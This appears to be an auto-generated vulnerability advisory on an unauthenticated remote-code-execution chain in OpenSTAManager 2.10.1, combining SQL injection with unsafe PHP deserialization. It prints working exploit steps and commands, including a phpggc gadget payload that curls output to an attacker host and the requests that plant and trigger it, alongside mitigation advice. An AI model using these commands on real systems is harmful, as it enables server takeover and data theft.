Listen to this Post
How the CVE Works:
The vulnerability chain combines a pre‑authenticated SQL injection (GHSA-2fr7-cc4f-wh98) with an unauthenticated insecure deserialization in oauth2.php. The oauth2.php endpoint sets $skip_permissions = true, making it accessible without any authentication. It takes an attacker‑controlled `state` GET parameter and queries the `zz_oauth2` table for a record matching that state. The record’s `access_token` column is then passed to `unserialize()` without any class restrictions. An attacker who can write to the `zz_oauth2` table (using the SQL injection in the Aggiornamenti module) can insert a malicious PHP object (gadget chain). When the unauthenticated request triggers the deserialization, the gadget chain executes arbitrary commands as the `www‑data` user. The SQL injection is performed via the `risolvi‑conflitti‑database` action, which allows raw SQL queries. To make the INSERT persist despite an `exit()` later, the attacker includes DDL statements (e.g., CREATE TABLE) that force an implicit commit. The deserialization uses a Laravel gadget chain (Laravel/RCE22) that leverages `PendingBroadcast::__destruct()` to call system(). The command runs during error cleanup, even though the HTTP response is a 500 error.
DailyCVE Form:
Platform: OpenSTAManager
Version: 2.10.1 affected
Vulnerability : Unauthenticated RCE
Severity: Critical
date: 2026-04-01
Prediction: Patch April 15
Analytics
What Undercode Say:
Generate Laravel/RCE22 payload with phpggc inside the container docker exec osm-web php /tmp/phpggc/phpggc Laravel/RCE22 system 'curl http://attacker:9999/rce-$(id|base64)' Trigger the SQL injection to plant the payload (authenticated) curl -X POST http://target/actions.php \ -H "Cookie: PHPSESSID=..." \ -d "op=risolvi-conflitti-database&id_module=6&queries=[\"INSERT INTO zz_oauth2 ...\"]" Unauthenticated trigger that deserializes and executes the command curl "http://target/oauth2.php?state=poc-xxx&code=x"
How Exploit:
- Authenticate as an admin to obtain a session cookie.
- Find the “Aggiornamenti” module ID (e.g., via sidebar or database query).
- Use `risolvi‑conflitti‑database` to execute raw SQL that inserts a malicious serialized object into
zz_oauth2.access_token; include DDL statements to force commit. - Send a GET request to `oauth2.php` with the same `state` value; the `unserialize()` triggers the gadget chain and runs the command.
Protection from this CVE
- Restrict `unserialize()` by specifying `[‘allowed_classes’ => [AccessToken::class]]` in
src/Models/OAuth2.php. - Replace
serialize()/unserialize()withjson_encode()/json_decode()for token storage. - Remove `$skip_permissions = true` from `oauth2.php` and require authentication, or validate the `state` parameter against a server‑side session value.
- Apply the patch for GHSA-2fr7-cc4f-wh98 to fix the underlying SQL injection.
Impact
- Confidentiality: Read any file, database credentials, and API keys.
- Integrity: Write files, install backdoors, modify application logic.
- Availability: Delete files, cause denial of service.
- Scope: Command execution as `www‑data` enables pivoting to internal systems.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

